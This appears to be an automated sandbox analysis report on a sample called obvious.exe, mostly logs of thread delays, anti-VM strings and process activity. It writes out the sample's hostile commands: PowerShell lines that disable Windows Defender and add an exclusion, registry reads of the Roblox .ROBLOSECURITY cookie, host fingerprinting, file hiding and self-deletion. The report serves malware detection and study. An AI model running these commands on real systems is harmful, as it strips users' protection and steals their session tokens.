                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592688Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592563Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592438Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592328Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592219Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592094Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 591984Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 591875Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 591766Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\obvious.exeWindow / User API: threadDelayed 6143Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeWindow / User API: threadDelayed 3699Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3963Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5835Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2997Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 377Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4996Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1629Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4241Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1792Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2889
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 999
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -597281s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -597172s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -597047s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -596937s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -596828s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -596717s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -596609s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -596500s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -596362s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -596234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -596125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -596016s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -595906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -595796s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -595687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -595575s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -595467s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -595063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -594922s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -594813s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -594688s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -594578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -594469s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -594344s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -594234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -594125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -594013s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -593906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -593797s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -593684s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -593578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -593469s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -593344s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -593234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -593123s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -593014s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -592906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -592797s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -592688s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -592563s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -592438s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -592328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -592219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -592094s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -591984s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -591875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exe TID: 7568Thread sleep time: -591766s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 3963 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep count: 5835 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep count: 2997 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep count: 377 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 4996 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 1629 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 4241 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 1792 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 2889 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep count: 999 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 597281Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 597172Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 597047Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596937Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596717Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596609Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596500Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596362Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596234Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596125Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 596016Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595906Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595796Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595687Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595575Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595467Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 595063Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594922Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594813Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594688Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594578Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594469Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594344Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594234Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594125Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 594013Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593906Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593797Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593684Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593578Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593469Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593344Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593234Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593123Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 593014Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592906Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592797Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592688Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592563Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592438Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592328Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592219Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 592094Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 591984Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 591875Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeThread delayed: delay time: 591766Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: obvious.exe, uGCIY.scr.0.drBinary or memory string: vboxtray
                        Source: uGCIY.scr.0.drBinary or memory string: vboxservice
                        Source: obvious.exe, uGCIY.scr.0.drBinary or memory string: qemu-ga
                        Source: uGCIY.scr.0.drBinary or memory string: vmwareuser
                        Source: obvious.exe, uGCIY.scr.0.drBinary or memory string: vmusrvc
                        Source: uGCIY.scr.0.drBinary or memory string: vmwareservice+discordtokenprotector
                        Source: uGCIY.scr.0.drBinary or memory string: vmsrvc
                        Source: uGCIY.scr.0.drBinary or memory string: vmtoolsd
                        Source: uGCIY.scr.0.drBinary or memory string: vmwaretray
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                        Source: obvious.exe, 00000000.00000002.2322536047.0000012F5F8B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\obvious.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\obvious.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'Jump to behavior
                        Modifies Windows Defender protection settings
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\obvious.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Users\user\Desktop\obvious.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
